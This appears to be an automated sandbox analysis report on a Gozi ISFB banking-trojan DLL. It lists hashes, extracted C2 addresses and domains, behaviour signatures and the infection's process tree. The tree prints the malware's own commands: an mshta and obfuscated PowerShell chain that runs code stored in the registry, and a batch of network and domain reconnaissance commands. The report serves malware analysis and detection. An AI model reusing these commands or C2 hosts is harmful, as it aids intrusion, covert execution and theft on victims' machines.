Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    03-08-2022 09:30

General

  • Target

    62ea3f935563b.dll

  • Size

    300KB

  • MD5

    614e312af0e5de7c6b9819e3a1c766d4

  • SHA1

    01e384618d8eadb244184e66e6450752ea0ceade

  • SHA256

    982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203

  • SHA512

    362b32fbc61baf1c757f72d61e582e2741553eda4de022311757a0732a23edabafbcd6affdab97c49d5e1378587b16f1d6730fd9446c801d791056896414d302

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

C2

config.edge.skype.com

37.120.206.71

37.120.206.84

193.106.191.163

Attributes
  • base_path

    /drew/

  • build

    250240

  • exe_type

    loader

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

C2

37.120.206.91

37.120.206.95

havefuntxmm.at

5.42.199.57

xerkdeoleone.at

Attributes
  • base_path

    /images/

  • build

    250240

  • exe_type

    worker

  • extension

    .jlk

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network 1 TTPs 3 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Modifies registry class 64 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3444
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    • Modifies registry class
    PID:5096
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:4408
  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
    PID:3788
  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2648
    • C:\Windows\system32\regsvr32.exe
      regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:428
      • C:\Windows\SysWOW64\regsvr32.exe
        /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4556
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ytyk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ytyk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\8A2718CF-61F1-4CDB-3B5E-25409F722974\\\ManagerMemory'));if(!window.flag)close()</script>"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2216
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name idjndxe -value gp; new-alias -name bifqcj -value iex; bifqcj ([System.Text.Encoding]::ASCII.GetString((idjndxe "HKCU:Software\AppDataLow\Software\Microsoft\8A2718CF-61F1-4CDB-3B5E-25409F722974").ProcessOptions))
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4384
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4108
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp" "c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\CSCD5E2C973230047EB9396AC76FA5C35C8.TMP"
            5⤵
            PID:3796
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3116
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F80.tmp" "c:\Users\Admin\AppData\Local\Temp\gonep1pl\CSCD127D4C758CE4227BCC828CF19FCFE9.TMP"
            5⤵
            PID:3580
    • C:\Windows\system32\cmd.exe
      cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4292
      • C:\Windows\system32\more.com
        more
        3⤵
        PID:852
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic computersystem get domain
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5064
    • C:\Windows\syswow64\cmd.exe
      "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
      2⤵
      PID:5000
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:1984
    • C:\Windows\system32\cmd.exe
      cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5060
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:656
    • C:\Windows\system32\cmd.exe
      cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Windows\system32\net.exe
        net view
        3⤵
        • Discovers systems in the same network
        PID:4836
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:2040
    • C:\Windows\system32\cmd.exe
      cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:616
      • C:\Windows\system32\nslookup.exe
        nslookup 127.0.0.1
        3⤵
        PID:4508
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:4624
    • C:\Windows\system32\cmd.exe
      cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:2616
      • C:\Windows\system32\tasklist.exe
        tasklist.exe /SVC
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:4444
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:4208
    • C:\Windows\system32\cmd.exe
      cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:4732
      • C:\Windows\system32\driverquery.exe
        driverquery.exe
        3⤵
        PID:4616
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:1768
    • C:\Windows\system32\cmd.exe
      cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:3476
      • C:\Windows\system32\reg.exe
        reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
        3⤵
        PID:4604
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:596
    • C:\Windows\system32\cmd.exe
      cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:1976
      • C:\Windows\system32\net.exe
        net config workstation
        3⤵
        PID:3012
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 config workstation
          4⤵
          PID:2696
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:4904
    • C:\Windows\system32\cmd.exe
      cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:428
      • C:\Windows\system32\nltest.exe
        nltest /domain_trusts
        3⤵
        PID:332
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:2036
    • C:\Windows\system32\cmd.exe
      cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:2456
      • C:\Windows\system32\nltest.exe
        nltest /domain_trusts /all_trusts
        3⤵
        PID:2032
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:1360
    • C:\Windows\system32\cmd.exe
      cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:1936
      • C:\Windows\system32\net.exe
        net view /all /domain
        3⤵
        • Discovers systems in the same network
        PID:4216
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:4156
    • C:\Windows\system32\cmd.exe
      cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:1528
      • C:\Windows\system32\net.exe
        net view /all
        3⤵
        • Discovers systems in the same network
        PID:3248
    • C:\Windows\system32\cmd.exe
      cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:2308
    • C:\Windows\system32\cmd.exe
      cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C850.bin1 > C:\Users\Admin\AppData\Local\Temp\C850.bin & del C:\Users\Admin\AppData\Local\Temp\C850.bin1"
      2⤵
      PID:3640
  • C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    1⤵
    • Gathers system information
    PID:384

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\C850.bin

    Filesize

    65KB

    MD5

    cd59f10228885715c333d108db13007f

    SHA1

    431666dc5693935be2cf9b18fa689568f34e20b8

    SHA256

    8b5374afbd47876195196d8df87f2ddafce360434215042b3de53fba9599901a

    SHA512

    02cba01ce794c077e25dd59bb0335150b3550ac733d7542e831ab8b0ae3e209e6f1f1d04b429af2fb60daf2490e089b8f6abfd5de8027ad2f139c047cb62cb43

  • C:\Users\Admin\AppData\Local\Temp\C850.bin1

    Filesize

    44B

    MD5

    f7aea2435aa888b709ca20f816c33bfd

    SHA1

    38717c9a73b5f8bd399839cbe0aa57518427e758

    SHA256

    f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

    SHA512

    1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

  • C:\Users\Admin\AppData\Local\Temp\C850.bin1

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\Local\Temp\C850.bin1

    Filesize

    2KB

    MD5

    b4d5b46f6cbb26eae4510ffefbd50180

    SHA1

    5b2bace7028f97c76cc98177ee27dd1d3a7d947a

    SHA256

    03c078be2f8e50148af07cd81ffdaeabbe6421c8448487144f05ed159633194b

    SHA512

    60d92dfd725e186ba12f5752cab6a6aae10f2bcc30a4ae7ee73137ae71a0310fb2e9d51ed35e1cc38392ec26f22d33da8378162af1607c3f79bc499513432333

  • C:\Users\Admin\AppData\Local\Temp\C850.bin1

    Filesize

    2KB

    MD5

    11304e810189d866fb1d067b4226f720

    SHA1

    37f1c3a86c37957bd6f1ee4355a7228969de8954

    SHA256

    051f33538ab034544e8c652ca3967a3590e6749c1119e092b8378e3562dd152f

    SHA512

    4be53d94bc47367bfda906bae5ae024f07ddbbec6c7668c9aab13d9c149b94fd887f751d23e6d592f67dea48a4a817c5ab53e2f2b857f9af8c29e31f8e2d5e10

  • C:\Users\Admin\AppData\Local\Temp\C850.bin1

    Filesize

    2KB

    MD5

    6555e00a5bd734ac4985eae8005caa4a

    SHA1

    8db986ba58e89bbef081e8c62cfcbb698faefbab

    SHA256

    14601575b135a2a88a3052d986b9e10bac67bec1d9a0cc34a2a721bf6ac81a2e

    SHA512

    fdb104e96b1c20b2984710cc3d823eb47ad2d1bb747d92d43001f0acbed053b4b8de030f697293643b147820e3f5973f7e39ecf4455dd5b3684dbe7767fbfdbb

  • C:\Users\Admin\AppData\Local\Temp\C850.bin1

    Filesize

    9KB

    MD5

    85ece63f96c67c19c30d853daa1f2f80

    SHA1

    6dabfd5ea6ae3a2248d837afde06566e7f21d8c7

    SHA256

    69b1314c678146fd450e7d176d7c6a6b899cc22b586fb47e9c82f2fa342760f5

    SHA512

    bbbe91e7de73c40b22c9560fea39fdb97bbd97c910cb43034d1e6204f7b90462872c95416df92fe80e67a8b8307a5b6057d9184be6d6bab2a904225c4034d5d2

  • C:\Users\Admin\AppData\Local\Temp\C850.bin1

    Filesize

    35KB

    MD5

    064e1c6d618d51982a3fc49034449279

    SHA1

    02b24698dd2deda95e2b4a6a89dcd4aba575cba6

    SHA256

    3342616c61590237764c5eb15305ff061ff5214d0d0f1a6629ac8c555344983e

    SHA512

    74cd677be6c6a2f0d5c9b58b5f0f185c1f3bfafc12565a9953f525f5c60dbab6db4fb8054620c3c879ac5cf415f35603be14e20b7f11dc0dac22672a32dedabf

  • C:\Users\Admin\AppData\Local\Temp\C850.bin1

    Filesize

    64KB

    MD5

    62e78c50aac8d85dc5921a8fa49476e5

    SHA1

    11ffee8c79e8ea84c5ef347451115379a1b5cf25

    SHA256

    a9dc4122649f89630c6383ce1602691faee10e9a5835d3e36709b7c4cbb802f5

    SHA512

    3748f7781dc4d4bd24a69cd532226d0c621fe7e95c2eba8efaf57042017fddfbe45bd9c8aee17c42e8a13575aa30b1b791c733ce25a468d814cf4693865f1f3a

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        64KB

                                                                        MD5

                                                                        62e78c50aac8d85dc5921a8fa49476e5

                                                                        SHA1

                                                                        11ffee8c79e8ea84c5ef347451115379a1b5cf25

                                                                        SHA256

                                                                        a9dc4122649f89630c6383ce1602691faee10e9a5835d3e36709b7c4cbb802f5

                                                                        SHA512

                                                                        3748f7781dc4d4bd24a69cd532226d0c621fe7e95c2eba8efaf57042017fddfbe45bd9c8aee17c42e8a13575aa30b1b791c733ce25a468d814cf4693865f1f3a

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        1e1ee75c750bc92d38124ac10b634351

                                                                        SHA1

                                                                        49c0d724825a589a830b3e24e7b6e63197dbc267

                                                                        SHA256

                                                                        01399d883cf2af6374962b1c900d17c84dadb3c2fbb26218224208d69951cf97

                                                                        SHA512

                                                                        256e5ee76b4464bd0dcd9bfbcc85dd5b05572da458abe15a3446a119b06c4f694cdbf29e7b0bdf592f01c4e81ced5e67e8a78cba820336b3291c3d37b28b851f

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        1e1ee75c750bc92d38124ac10b634351

                                                                        SHA1

                                                                        49c0d724825a589a830b3e24e7b6e63197dbc267

                                                                        SHA256

                                                                        01399d883cf2af6374962b1c900d17c84dadb3c2fbb26218224208d69951cf97

                                                                        SHA512

                                                                        256e5ee76b4464bd0dcd9bfbcc85dd5b05572da458abe15a3446a119b06c4f694cdbf29e7b0bdf592f01c4e81ced5e67e8a78cba820336b3291c3d37b28b851f

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        a02aaa0b88c1c0e78d57de5c5030a0f5

                                                                        SHA1

                                                                        f705b3e4411ce3fd568df68ec50444b124dded80

                                                                        SHA256

                                                                        80829bd83b8024dbb40c5ae27926ad7e77dcb3c1ed1cda8b2bc2822daa6f3780

                                                                        SHA512

                                                                        3be19135519a0bfb22c87cb890b9e82403746da773be6aac55d3e15bfcfbc3f5e9959ddbef408e88cb146f9b1844a0bf7f614c3563cc01dc9908e00f13513c8a

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        4dfe7605d104363749b031810b0ed58a

                                                                        SHA1

                                                                        879ade695f3cee771e5ec57c648946b5064a86a8

                                                                        SHA256

                                                                        7b5d9bfeda2472edc4aba4a1ee23857a62b12cd50bac1ebf0a6b69b167056bfa

                                                                        SHA512

                                                                        b14ebad24201fe546cf1703ce65bce0d206c74d9cbf2e9b8637b84a8b1c58ea2070328f8d1dd96fc19820a738bcb519d11cd83dcc4429363e6913942f1db8982

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        ae8cd7c77619badaa90ce1fc70c97a82

                                                                        SHA1

                                                                        5d1de7e2a02422a967a87183e18ad21a47877d36

                                                                        SHA256

                                                                        126e9149cb9692c0116044bc8efba7db39f455b181e03809ba708b92e31040be

                                                                        SHA512

                                                                        3d603aa42838de2bc90b9f77510615a5c31e4f0965efb198b792a131f12fc05fba109442802e3b448c48ef39fd5278fe99906a4993ebc8fd98f5bb43357ff554

                                                                      • C:\Users\Admin\AppData\Local\Temp\C850.bin1

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        cd59f10228885715c333d108db13007f

                                                                        SHA1

                                                                        431666dc5693935be2cf9b18fa689568f34e20b8

                                                                        SHA256

                                                                        8b5374afbd47876195196d8df87f2ddafce360434215042b3de53fba9599901a

                                                                        SHA512

                                                                        02cba01ce794c077e25dd59bb0335150b3550ac733d7542e831ab8b0ae3e209e6f1f1d04b429af2fb60daf2490e089b8f6abfd5de8027ad2f139c047cb62cb43

                                                                      • C:\Users\Admin\AppData\Local\Temp\RES7F03.tmp

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        dec1e106b9bd42ff76dcca48a4647c7f

                                                                        SHA1

                                                                        700c079453dddae9cb51e6048056e21f3a29f8b7

                                                                        SHA256

                                                                        675f5b7af3c3be845e7b1f5b1fb3f8ba16370e7400e3151c15722e85185e4b06

                                                                        SHA512

                                                                        3293dc2110074e5913d19e7f1737c384eceeb12f46d98f39ce0171dbe97e6777c2aa587a32db7eb87c4ae4df1fe3e789b18b538e9f26ce2d2662520e8e403f70

                                                                      • C:\Users\Admin\AppData\Local\Temp\RES7F80.tmp

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        99f16ff1da7e804feb5e04290e668d40

                                                                        SHA1

                                                                        416ad9642d6bff1e68deb308ad4b912007173636

                                                                        SHA256

                                                                        be6a979c37f0e67a6ca68b41264c5260fa322ff4b64501457f13c221e93d8609

                                                                        SHA512

                                                                        0fe14f6280f4a1bbbf65374e8afcb0670185366cd9ba4d174dee47a4293d9b5d73ef90a42282d61fba1aad99bfadfe7c6493f4042daf3288a22178c856ecd297

                                                                      • C:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.dll

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        777821e762608d2478554cc466301fd4

                                                                        SHA1

                                                                        4b5a0f3721d809984415ea2690f802582aa00633

                                                                        SHA256

                                                                        0396723ec1105c30f3f49c7a802a39fd9ac6c5c425c9ee5424c093172ebee0af

                                                                        SHA512

                                                                        28166ca3e093a667b55a802fbe0f9f695810aeebf7c33f1938f0827b1c5c39eefb628541bdd1fe3e5ce1c05004dddcdcb06dcc08548cecdde51c548d316d4800

                                                                      • C:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.dll

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        b8c0cd5cece832852d7ca26c0f7ddabe

                                                                        SHA1

                                                                        8cf07785708a754cedd67107652c879da7322de0

                                                                        SHA256

                                                                        fda0200dcb3dc7ca5cbe804ef38af5e32a19a992a1574fd36d5b3443b19be0f2

                                                                        SHA512

                                                                        d493faea775f560243423cfaf1c2bd56902276fed3e6a6d4c68ee99f4cc5653a99ffbb8faf48efed729013bd436cdb27aead31ba3a7aaa34ec0bbd8b05310842

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\gonep1pl\CSCD127D4C758CE4227BCC828CF19FCFE9.TMP

                                                                        Filesize

                                                                        652B

                                                                        MD5

                                                                        146183315847259526b776f4e05702d4

                                                                        SHA1

                                                                        9c16126b9c80ce0a775dd0e2b1b6a42c2f817b6d

                                                                        SHA256

                                                                        9176550073b3105d0fbf6cf246ae7b244289943b5230d1315d6daf26d2c955f7

                                                                        SHA512

                                                                        2cc4cdaf3330fb058782c880eec0b8e49712ae3cd5f199a8f892ddde20fc7ec165ba3f9a7c5e83e5ae0aa1cf8edbe0dfab421ada3084c41a5942157f494f04d8

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.0.cs

                                                                        Filesize

                                                                        400B

                                                                        MD5

                                                                        aca9704199c51fde14b8bf8165bc2a4c

                                                                        SHA1

                                                                        789b408ccad29240bd093515cbd19a199ad2c1c8

                                                                        SHA256

                                                                        cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27

                                                                        SHA512

                                                                        a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\gonep1pl\gonep1pl.cmdline

                                                                        Filesize

                                                                        369B

                                                                        MD5

                                                                        a12dbc03083c923b91f0ae5e81c0fa65

                                                                        SHA1

                                                                        2e75e9e5e1bfc1a941ba7fed967b1058f5e0f4b1

                                                                        SHA256

                                                                        d2b3d6b1ca5ec7600b844f6108ec1da5367895c8f6bfcc9de580f4a30346b4b9

                                                                        SHA512

                                                                        7a65f3c48de859102d6725b7093ab38bfd2edb9737be999f926e04fd96a90a934fb162290e32b8d7e3ec267f1374e7b2623060637d419b18778f00a637971762

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\CSCD5E2C973230047EB9396AC76FA5C35C8.TMP

                                                                        Filesize

                                                                        652B

                                                                        MD5

                                                                        4e155fb1f268acea23442266fa8c4cf3

                                                                        SHA1

                                                                        cb4dc2af42c4266dbbf55b5dc1135b51e3586d28

                                                                        SHA256

                                                                        e5b9cd9a3318ad01f7c89ffe770a17c1ebd206dff950943fa7b463ee76e166f9

                                                                        SHA512

                                                                        ae27fdfbdf04fb2de3f473a078e3154caf8f2d0f277f0ef9e149f6b8e517e27d5e9cb83dc8f726261ff91acd2657300e3f1c099e49fb173c56fdbdb0dae8f999

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.0.cs

                                                                        Filesize

                                                                        410B

                                                                        MD5

                                                                        9a10482acb9e6952b96f4efc24d9d783

                                                                        SHA1

                                                                        5cfc9bf668351df25fcda98c3c2d0bb056c026c3

                                                                        SHA256

                                                                        a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377

                                                                        SHA512

                                                                        e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\l3z4y1p4\l3z4y1p4.cmdline

                                                                        Filesize

                                                                        369B

                                                                        MD5

                                                                        857aefc206e63debbae5504d0f213632

                                                                        SHA1

                                                                        fc39ba707407a0cf88f36039cf3d00e758c335d7

                                                                        SHA256

                                                                        f9fe954f217605799e4d4b0d1ecf5f048b7a087416def84fb5ff2ac460939de1

                                                                        SHA512

                                                                        9502234b553da9fcf25b7d4089947aedc19eeb86114efbb67900b1cce5d37be9479593caaa733d739078c32b4e16e6d4d075ba8bd414c9f4d4be52238defdf96
